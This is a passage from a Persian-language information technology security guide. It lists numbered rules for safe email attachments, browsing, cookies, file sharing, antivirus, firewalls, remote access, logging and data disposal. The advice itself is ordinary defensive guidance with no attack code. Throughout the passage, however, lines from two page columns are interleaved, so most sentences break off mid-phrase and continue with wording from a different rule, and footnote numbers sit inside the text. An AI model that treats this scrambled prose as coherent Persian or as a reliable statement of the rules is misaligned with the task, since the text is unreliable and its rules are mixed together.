ﻗﺎﻋﺪﺓ .۵ﺑﺮﻧﺎﻣــﺔ ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺧــﻮﺩ ﺭﺍ ﺑﮕﻮﻧــﻪﺍﻱ ﭼﻪ ﻛﻨﻨﺪ ﻭ ﺑﺎ ﭼﻪ ﻛﺴﻲ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻧﺪ .ﺗﻬﻴﺔ ﻳﻚ ﺑﺮﻧﺎﻣﺔ
ﭘﻴﻜﺮﺑﻨــﺪﻱ ﻛﻨﻴــﺪ ﻛــﻪ ﺿــﻤﻴﻤﻪﻫــﺎ ١٩٦ﺭﺍ ﺑــﺼﻮﺭﺕ ﺁﻣﻮﺯﺷﻲ ﻣﻨﺎﺳﺐ ﺑـﺮﺍﻱ ﻛـﺎﺭﺑﺮﺍﻥ ﻣـﻲﺗﻮﺍﻧـﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﻪ
ﺧﻮﺩﻛﺎﺭ ﺑﺎﺯ ﻧﻜﻨﺪ. ﻗﺴﻤﺘﻲ ﺍﺯ ﺳﻴـﺴﺘﻢ ﺗـﺪﺍﻓﻌﻲ ﺷـﻤﺎ ﺗﺒـﺪﻳﻞ ﻛﻨـﺪ .ﻧﺎﺁﮔـﺎﻩ
ﻗﺎﻋﺪﺓ .۶ﻗﺒﻞ ﺍﺯ ﺑﺎﺯ ﻛﺮﺩﻥ ﻫﺮ ﻧﻮﻉ ﺿﻤﻴﻤﺔ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ، ﻧﮕﻬﺪﺍﺷﺘﻦ ﻛﺎﺭﺑﺮﺍﻥ ﻧـﺴﺒﺖ ﺑـﻪ ﻣﺤـﺪﻭﺩﻳﺘﻬﺎ ﻭ ﻋﻤﻠﻜـﺮﺩ
ﺑﻪ ﻧﺎﻡ ﺁﻥ ﺩﻗﺖ ﻛﻨﻴﺪ ﺗـﺎ ﻣﻄﻤـﺌﻦ ﺷـﻮﻳﺪ ﻛـﻪ ﻳـﻚ ﺳﻴﺴﺘﻢ ﺑﺎﻋﺚ ﺍﻓﺰﺍﻳﺶ ﺍﻣﻨﻴﺖ ﻧﻤﻲﮔﺮﺩﺩ؛ ﭼﺮﺍﻛﻪ ﻫﻤـﻮﺍﺭﻩ
ﺑﺮﻧﺎﻣﺔ ﺍﺟﺮﺍﻳﻲ ﻧﻴﺴﺖ. ﻣﻨﺎﺑﻊ ﺍﻃﻼﻋﺎﺗﻲ ﺩﻳﮕـﺮﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺩﺭ ﺩﺳـﺘﺮﺱ
ﻣﻬﺎﺟﻤﺎﻥ ﻣﺼﻤﻢ ﺑﺎﺷﺪ.
196 Attachment
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٠٦
ﻗﺎﻋﺪﺓ .۱۵ﺍﮔﺮ ﺍﺯ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳـﻞ ١٩٩ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤـﻲﻛﻨﻴـﺪ ،ﺁﻧـﺮﺍ ﻗﺎﻋﺪﺓ .۷ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﺿﻤﻴﻤﻪﺍﻱ ﺭﺍ ﻛﻪ ﺍﺯ ﻳﻚ ﻏﺮﻳﺒﻪ ﺩﺭﻳﺎﻓﺖ
ﻏﻴﺮﻓﻌــﺎﻝ ﻛﻨﻴــﺪ .ﺍﮔــﺮ ﺍﺯ ﺍﺷــﺘﺮﺍﻙ ﻓﺎﻳــﻞ ﺍﺳــﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺍﻳﺪ ﺑﺎﺯ ﻧﻜﻨﻴﺪ ،ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻓﺎﻳـﻞ
ﻣــﻲﻛﻨﻴــﺪ ،ﻧﺎﻣﻬــﺎﻱ ﻛــﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ ﻣﺮﺑﻮﻃﻪ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺣﺎﻭﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﺨﺮﺏ ﺑﺎﺷﺪ.
ﻣﺴﺘﺤﻜﻢ ﺑﺮﮔﺰﻳﻨﻴـﺪ ﻭ ﻣﺠﻮﺯﻫـﺎﻱ ﺩﺳﺘﺮﺳـﻲ ﺭﺍ ﺗـﺎ
ﻗﺎﻋﺪﺓ .۸ﺍﺯ ﮔﺸﻮﺩﻥ ﺿﻤﻴﻤﻪﺍﻱ ﻛﻪ ﺍﺯ ﻃﺮﻑ ﻳﻚ ﻓﺮﺩ ﺁﺷـﻨﺎ ﻭ
ﺣﺪﺍﻗﻞ ﻣﻤﻜﻦ ﻛﻪ ﻫﻤﭽﻨﺎﻥ ﺍﻣﻜﺎﻥ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻣـﻮﺭﺩ
ﻣﻄﻤﺌﻦ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩ ﻫﻢ ﭘﺮﻫﻴﺰ ﻛﻨﻴﺪ ،ﻣﮕـﺮ ﺁﻧﻜـﻪ
ﻧﻈﺮ ﺭﺍ ﺑﻪ ﺷﻤﺎ ﻣﻲﺩﻫﺪ ﻣﺤﺪﻭﺩ ﻧﻤﺎﻳﻴﺪ.
ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﻛﻪ ﺁﮔﺎﻫﺎﻧﻪ ﺍﺭﺳﺎﻝ ﺷﺪﻩ ﺍﺳﺖ.
ﻗﺎﻋﺪﺓ .۱۶ﺍﮔﺮ ﺑﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺩﻳﮕﺮﻱ ﻓﺎﻳﻞ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻪﺍﻳﺪ،
ﻗﺎﻋﺪﺓ .۹ﺑﺮﻧﺎﻣﺔ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺭﺍ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ
ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺁﻧﻬﺎ ﻧﻴﺰ ﻧﻜـﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﺭﺍ
ﻛﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﻔﻨﻨﻲ ١٩٧HTMLﺭﺍ ﭘـﺮﺩﺍﺯﺵ
ﺟﺪﻱ ﻣﻲﮔﻴﺮﻧﺪ.
ﻧﻜﻨﺪ ﻭ ﺑﺮﺍﻱ ﺩﻳﮕﺮﺍﻥ ﻫﻢ ﺍﺭﺳﺎﻝ ﻧﻨﻤﺎﻳﺪ.
ﻗﺎﻋﺪﺓ .۱۷ﭘﻴﺎﻣﻬﺎﻱ ﻓﻮﺭﻱ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺴﻴﺎﺭ ﻛﺎﺭﺁﻣـﺪ ﻭ ﻣﻔﻴـﺪ
ﻗﺎﻋﺪﺓ .۱۰ﺍﺯ ISPﺧﻮﺩ ﺑﭙﺮﺳﻴﺪ ﻛﻪ ﺁﻳﺎ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ
ﺑﺎﺷﻨﺪ ،ﻭﻟﻲ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎ ﻣﺮﺍﻗﺒﺖ ﻭ ﺁﮔﺎﻫﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ
ﭘــﻴﺶ ﺍﺯ ﺗﺤﻮﻳــﻞ ﺑــﻪ ﺷــﻤﺎ ﺍﺯ ﻧﻈــﺮ ﻭﻳــﺮﻭﺱ ﻭ ﻳــﺎ
ﻗﺮﺍﺭ ﺩﻫﻴﺪ.
ﺗﻬﺪﻳﺪﻫﺎﻱ ﻣﺸﺎﺑﻪ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻳﺎ ﻧﻪ.
ﻗﺎﻋﺪﺓ .۱۸ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫـﺎﻳﻲ ﻛـﻪ ﺑـﻪ ﺩﺳﺘﺮﺳـﻲ ﺭﺍﻫﺒـﺮﻱ
ﻗﺎﻋﺪﺓ .۱۱ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻫﺎﻱ ﻭﺏ ﺍﻣﻜـﺎﻥ downloadﻭ ﺍﺟـﺮﺍﻱ
ﻧﻴﺎﺯﻱ ﻧﺪﺍﺭﻧﺪ -ﻣﺜﻞ ﻣﺮﻭﺭ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ -ﺣﺘـﻲ
ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻣﺸﻜﻠـﺴﺎﺯ ﺑﺎﺷـﻨﺪ ﺭﺍ
ﺩﺭ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺗﻚﻛﺎﺭﺑﺮﻩ ﻧﻴﺰ ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﺍﺯ ﺣـﺴﺎﺏ
ﻧﺪﻫﻴﺪ ،ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﻣﻄﻤﺌﻦ ﺑﺎﺷـﻴﺪ ﭘﺎﻳﮕـﺎﻩ ﻣﺮﺑﻮﻃـﻪ
ﻛﺎﺭﺑﺮﻱ ﺭﺍﻫﺒﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ.
ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﺍﺳﺖ.
ﻗﺎﻋﺪﺓ .۱۹ﺗﻤﺎﻡ ﺧﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻛـﻪ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﻧﻴـﺴﺘﻨﺪ ﻳـﺎ
ﻗﺎﻋﺪﺓ .۱۲ﻧﻤﺎﻳﺶ ﺁﺩﺭﺱ ﭘﺎﻳﮕﺎﻩ ﻭﺑـﻲ ﻛـﻪ ﻣـﺮﻭﺭ ﻣـﻲﻛﻨﻴـﺪ ﻭ
ﻛﺎﺭﺑﺮﺩ ﺯﻳﺎﺩﻱ ﻧﺪﺍﺭﻧﺪ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ.
ﺁﺩﺭﺳﻲ ﻛﻪ ﺩﺭﺣﺎﻝ ﺍﺗﺼﺎﻝ ﺑـﻪ ﺁﻥ ﻫـﺴﺘﻴﺪ ﺭﺍ ﻓﻌـﺎﻝ
ﻗﺎﻋﺪﺓ .۲۰ﻫﺮ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻛﻪ ﻧﺴﺒﺖ ﺑﻪ ﻭﻳﺮﻭﺱ ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﺍﺳﺖ ﻛﻨﻴﺪ .ﻫﻤﭽﻨـﻴﻦ ﻫﻨﮕـﺎﻡ ﻣـﺮﻭﺭ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻧﺎﺁﺷـﻨﺎ
ﺭﺍ ﺑﻪ ﻧﺮﻡ ﺍﻓـﺰﺍﺭ ﺿـﺪﻭﻳﺮﻭﺱ ﻣﺠﻬـﺰ ﻛﻨﻴـﺪ ﻭ ﺑـﺮﺍﻱ ﺑﺴﻴﺎﺭ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ،ﺧـﺼﻮﺻﹰﺎ ﺍﮔـﺮ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺟـﺎﺯﺓ
ﺩﺭﻳﺎﻓﺖ ﻧﺸﺎﻧﻬﺎﻱ ﺟﺪﻳﺪ ﻭﻳﺮﻭﺱ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﺭﻭﺯﺍﻧﻪ ﺍﺟﺮﺍﻱ ﺑﺮﻧﺎﻣﻪ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﻣﻲﺩﻫﻴﺪ.
ﺁﻧﺮﺍ ﺑﻪﺭﻭﺯ ﻧﻤﺎﻳﻴﺪ .ﻫﻤﭽﻨـﻴﻦ ﺑﺎﻳـﺪ ﺑـﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ
ﻗﺎﻋﺪﺓ .۱۳ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻛﻪ cookieﻫﺎ ﺗﺤﺖ ﭼﻪ ﺷﺮﺍﻳﻄﻲ ﺩﺭ
ﺗﻤﺎﻡ ﻓﺎﻳﻠﻬﺎﻱ ﺩﺳـﺘﮕﺎﻩ ﺭﺍ ﺍﺯ ﻧﻈـﺮ ﻭﺟـﻮﺩ ﻭﻳـﺮﻭﺱ،
ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺫﺧﻴﺮﻩ ﻣﻲﺷﻮﻧﺪ .ﺍﮔﺮ ﻗﺎﺩﺭ ﺑﻪ ﻛﻨﺘﺮﻝ ﺁﻧﻬـﺎ
ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ.
ﻧﻴﺴﺘﻴﺪ )ﻣﺜﻞ ﺯﻣﺎﻧﻴﻜﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﺍﻣﺎﻛﻦ ﻋﻤﻮﻣﻲ ﺍﺳﺘﻔﺎﺩﻩ
ﻗﺎﻋﺪﺓ .۲۱ﺣﺘﻲ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛـﻪ ﺑﻄـﻮﺭ ﺧـﺎﺹ ﺗﺤـﺖ ﻣﻲ ﻛﻨﻴﺪ( ،ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺧﺼﻮﺻﻲ ﺧﻮﺩ
ﺗﻬﺎﺟﻢ ﻭﻳﺮﻭﺳﻬﺎ ﻗـﺮﺍﺭ ﻧﺪﺍﺭﻧـﺪ -ﻣﺜـﻞ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺭﺍ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻧﻜﻨﻴﺪ.
ﻣﺒﺘﻨﻲ ﺑﺮ ﻳﻮﻧﻴﻜﺲ -ﻧﻴﺰ ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﺷﻮﺩ
ﻗﺎﻋﺪﺓ .۱۴ﭼﻨﺎﻧﭽﻪ ﻫﺮﮔﻮﻧﻪ ﺍﻃﻼﻋﺎﺕ ﺧﺼﻮﺻﻲ ﻭ ﻣﺤﺮﻣﺎﻧـﻪﺍﻱ
ﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﺁﻧﻬﺎ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ ﺩﻳﮕـﺮ ﻓﺮﺳـﺘﺎﺩﻩ
ﺭﻭﻱ ﺻﻔﺤﺔ ﻭﺏ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﺁﻣﺪ ،ﭘـﺲ ﺍﺯ ﺍﺗﻤـﺎﻡ
ﻣﻲﺷﻮﻧﺪ ﺁﻟﻮﺩﻩ ﺑﻪ ﻭﻳﺮﻭﺱ ﻧﻤﻲﺑﺎﺷﻨﺪ ﻭ ﺑﺮﺍﻱ ﮔﻴﺮﻧﺪﻩ
ﻛﺎﺭ ،ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ ١٩٨ﺭﺍ ﭘـﺎﻙ ﻛﻨﻴـﺪ .ﺍﮔـﺮ ﻗـﺎﺩﺭ ﺑـﻪ
ﺧﻄﺮﻱ ﺩﺭ ﺑﺮ ﻧﺪﺍﺭﻧﺪ.
ﺍﻳﻨﻜﺎﺭ ﻧﻴﺴﺘﻴﺪ )ﻣﺜﻞ ﺯﻣﺎﻧﻴﻜﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﺍﻣﺎﻛﻦ ﻋﻤـﻮﻣﻲ
ﻗﺎﻋﺪﺓ .۲۲ﺗﻤﺎﻡ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺎﻳﺪ ﺑﺎ ﻳﻜﻲ ﺍﺯ ﺍﻧﻮﺍﻉ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗـﺶ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻴـﺪ( ﺷـﺎﻳﺪ ﺑﻬﺘــﺮ ﺑﺎﺷـﺪ ﺍﺯ ﺍﻧﺠـﺎﻡ ﻛــﺎﺭ
ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ ،ﭼـﻪ ﺑـﺼﻮﺭﺕ ﺧﺼﻮﺻﻲ ﺧﻮﺩ ﺭﻭﻱ ﺁﻥ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﭙﺮﻫﻴﺰﻳﺪ.
ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﻭﻱ ﻫﻤﺎﻥ ﺭﺍﻳﺎﻧﻪ ﻭ ﭼـﻪ ﺑـﺼﻮﺭﺕ ﻳـﻚ
ﺗﻨﻬﺎ ﺍﺷﺨﺎﺻﻲ ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﺎ ﺩﺍﺩﻩﻫﺎ ﻛـﺎﺭ ﻛﻨﻨـﺪ ﺩﻳــﻮﺍﺭﺓ ﺁﺗــﺶ ﺟﺪﺍﮔﺎﻧــﻪ ﺑــﺮﺍﻱ ﻣﺤﺎﻓﻈــﺖ ﺍﺯ ﺗﻤــﺎﻡ
ﺑﺎﻳﺪ ﺑﻪ ﺁﻧﻬﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ )ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﻳﻚ ﺷﺒﻜﻪ.
ﻣﺎﺷﻴﻨﻬﺎﻱ Windowsﺑﻪ ﺍﻳـﻦ ﻣﻌﻨـﻲ ﺍﺳـﺖ ﻛـﻪ ﺑﺎﻳـﺪ ﺍﺯ
ﻗﺎﻋﺪﺓ .۲۳ﺍﮔﺮ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺍﺑﺰﺍﺭ ﺩﺳﺘﺮﺳـﻲ ﺍﺯ ﺭﺍﻩ
ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ NTFSﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ(
ﺩﻭﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻴﺪ ،ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛـﻪ ﺍﺯ ﺍﻣﻨﻴـﺖ
ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪﺭﻭﺯ ﺭﺍ ﺭﻭﻱ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎ، • ﻣﺴﺘﺤﻜﻤﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ )ﺩﺭ ﺣﺎﻟﺖ ﺣـﺪﺍﻗﻠﻲ ،ﺷﻨﺎﺳـﺔ
ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ ،ﻭ ﺗﻤﺎﻡ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮ ﹺﺭ ﻣﻨﺎﺳﺐ( ﺗﺎ ﻣﺒـﺎﺩﺍ ﻣﻬﺎﺟﻤـﺎﻥ ﻧﻴـﺰ ﺍﺯ
ﺍﻋﻤﺎﻝ ﻛﻨﻴﺪ .ﺩﻗﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﺍﻣـﻦ ﻛـﺮﺩﻥ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺸﺎﺑﻪ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﺳـﺘﻔﺎﺩﻩ
ﻧﮕﺎﺭﺷــﻬﺎﻱ ﺟﺪﻳــﺪ ﺳﻴــﺴﺘﻢﻋﺎﻣﻠﻬــﺎ ﺁﺳــﺎﻧﺘﺮ ﺍﺯ ﻛﻨﻨﺪ.
ﻧﮕﺎﺭﺷﻬﺎﻱ ﻗﺪﻳﻤﻲﺗﺮ ﺍﺳﺖ.
ﻗﺎﻋﺪﺓ .۲۴ﺛﺒــﺖ ﮔﺰﺍﺭﺷــﺎﺕ ﺑــﺮﺍﻱ ﻋﻤﻠﻜﺮﺩﻫــﺎ ﻭ ﻛﺎﺭﺑﺮﺩﻫــﺎﻱ
ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﻮﺩ ﺍﺯ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﺿـﺪﻭﻳﺮﻭﺱ • ﺳﻴﺴﺘﻢ ﺑﺎﻳـﺪ ﺑـﺼﻮﺭﺕ ﻣﻨﻄﻘـﻲ ﻓﻌـﺎﻝ ﺑﺎﺷـﺪ .ﺍﻳـﻦ
ﻭ ﻣﻬﺎﺟﻢﻳﺎﺏ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ. ﮔﺰﺍﺭﺷﺎﺕ ﺭﺍ ﻃﺒﻖ ﻳﻚ ﺭﻭﺍﻝ ﻣﺸﺨﺺ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ
ﻱ ﻛﺎﺭﺗﻬــﺎﻱ
ﻱ ﻓﺎﻳﻠﻬــﺎﻱ ﺩﺍﺩﻩﺍ ﹺ
ﺑــﺮﺍﻱ ﺭﻣﺰﮔــﺬﺍﺭ ﹺ • ﻗﺮﺍﺭ ﺩﻫﻴﺪ.
ﺍﻋﺘﺒﺎﺭﻱ ﺑﺎﻳﺪ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﭘﻴﺸﺮﻓﺘﺔ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻗﺎﻋﺪﺓ .۲۵ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺗـﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘـﻲ ﺧـﻮﺩ ﺭﺍ ﺑـﺎ ﺭﻭﺷـﻬﺎ ﻭ
ﺑﺨﺶ ﺳﻮﻡ
ﭘﺴﺮﺍﻥ ،٢٠٢ﻭ ﻣﻚ ﮔﺮﻭﻫﻴﻞ ٢٠٣ﻛﺘﺎﺑﻬﺎﻱ ﺧﻮﺑﻲ ﺩﺭ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴـﺪ ﻛـﻪ ﺗﻤـﺎﻣﻲ ﻛﺎﺭﻣﻨـﺪﺍﻥ - •
ﺑﺎﺏ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻣﻨﺘـﺸﺮ ﻛـﺮﺩﻩﺍﻧـﺪ. ﻣﺨﺼﻮﺻﹰﺎ ﻣﺪﻳﺮﺍﻥ ﺍﺭﺷﺪ -ﺑﺎﻭﺭ ﺩﺍﺭﻧﺪ ﻛـﻪ ﺍﻣﻨﻴـﺖ
ﻗﻴﻤﺖ ﺍﻳﻦ ﻛﺘﺎﺑﻬﺎ ﺑﺴﺘﻪ ﺑـﻪ ﻣﺤـﻞ ﺯﻧـﺪﮔﻲ ﺷـﻤﺎ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻥ ﺑﺴﻴﺎﺭ ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ.
ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺘﻔﺎﻭﺕ ﺑﺎﺷﺪ ،ﺍﻣﺎ ﺑﻪ ﻫﺮ ﺣﺎﻝ ﺧﺮﻳـﺪ ﺍﮔﺮ ﺍﻃﻼﻋﺎﺗﻲ ﻣﺜﻞ ﺩﺍﺩﻩ ﻫـﺎﻱ ﻛـﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﻭ •
ﻭ ﺍﺳــﺘﻔﺎﺩﺓ ﻣــﺆﺛﺮ ﺍﺯ ﺁﻧﻬــﺎ ﺳــﺮﻣﺎﻳﻪﮔــﺬﺍﺭﻱ ﺑــﺴﻴﺎﺭ ﺩﻳﮕﺮ ﺩﺍﺩﻩﻫﺎﻱ ﻣـﺎﻟﻲ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﺩﻳـﺴﻚ ﺳـﺨﺖ
ﻣﻔﻴﺪﻱ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﺪ. ﺣﺬﻑ ﻣﻲ ﻛﻨﻴﺪ ،ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺁﻥ ﺩﺍﺩﻩ ﺩﻳﮕـﺮ
ﺑﻪ ﻫﻴﭽﻮﺟﻪ ﻗﺎﺑﻞ ﺑﺎﺯﻳﺎﺑﻲ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ .ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ
ﺏ( ﺍﮔﺮ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﺭﺍﻳﺎﻧﻪ ﺍﺯ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﻗﺎﺑـﻞ
ﻓﺮﺍﺗﺮ ﺍﺯ ﭘﺎﻙ ﻛﺮﺩﻥ ﺳﺎﺩﺓ ﻓﺎﻳﻠﻬـﺎ ﺍﺳـﺖ .ﭼﻨﺎﻧﭽـﻪ
ﺩﺳﺘﺮﺱ ﺑﺎﺷﺪ:
ﻧﻤﻲﺩﺍﻧﻴﺪ ﻛﻪ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﭼﻄـﻮﺭ ﺑـﺼﻮﺭﺕ ﻛﺎﻣـﻞ ﺍﺯ
ﺗﻤﺎﻡ ﻧﻜﺎﺗﻲ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﻗﺒﻠﻲ ﮔﻔﺘﻪ ﺷـﺪ ،ﺑﻌـﻼﻭﺓ • ﺑﻴﻦ ﺑﺒﺮﻳﺪ ،ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺍﺯ ﺍﻓﺮﺍﺩ ﻣﺘﺨـﺼﺺ
ﻧﻜﺎﺕ ﺯﻳﺮ: ﻛﻤﻚ ﺑﮕﻴﺮﻳﺪ.
ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻧﺼﺐ ﻛﻨﻴﺪ ﺗـﺎ ﻣﻄﻤـﺌﻦ ﺷـﻮﻳﺪ • ﺩﺭ ﻓﻮﺍﺻﻞ ﻣﻨﻈﻢ ﺯﻣـﺎﻧﻲ ﻧـﺴﺨﺔ ﭘـﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ •
ﺗﻨﻬﺎ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﻣﺠﺎﺯ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ ﻛﻨﻴﺪ ﻭ ﺍﺯ ﺍﻳﻤﻨﻲ ﻧﺴﺨﻪﻫﺎﻳﻲ ﻛﻪ ﺣﺎﻭﻱ ﺍﻃﻼﻋـﺎﺕ
ﺭﺍﻳﺎﻧــﻪ ﺩﺳﺘﺮﺳــﻲ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻨﺪ ﻭ ﺍﺯ ﺩﺳﺘﺮﺳــﻲ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﻫﺴﺘﻨﺪ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﻛﻨﻴﺪ.
ﻋﻤﻮﻣﻲ ﺑﻪ ﺁﻥ ﺟﻠﻮﮔﻴﺮﻱ ﺧﻮﺍﻫﺪ ﺷﺪ.
ﺑﺎ ﺍﻧﺘـﺸﺎﺭ ﻳـﻚ "ﺳﻴﺎﺳـﺖ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ" ﺑـﻪ •
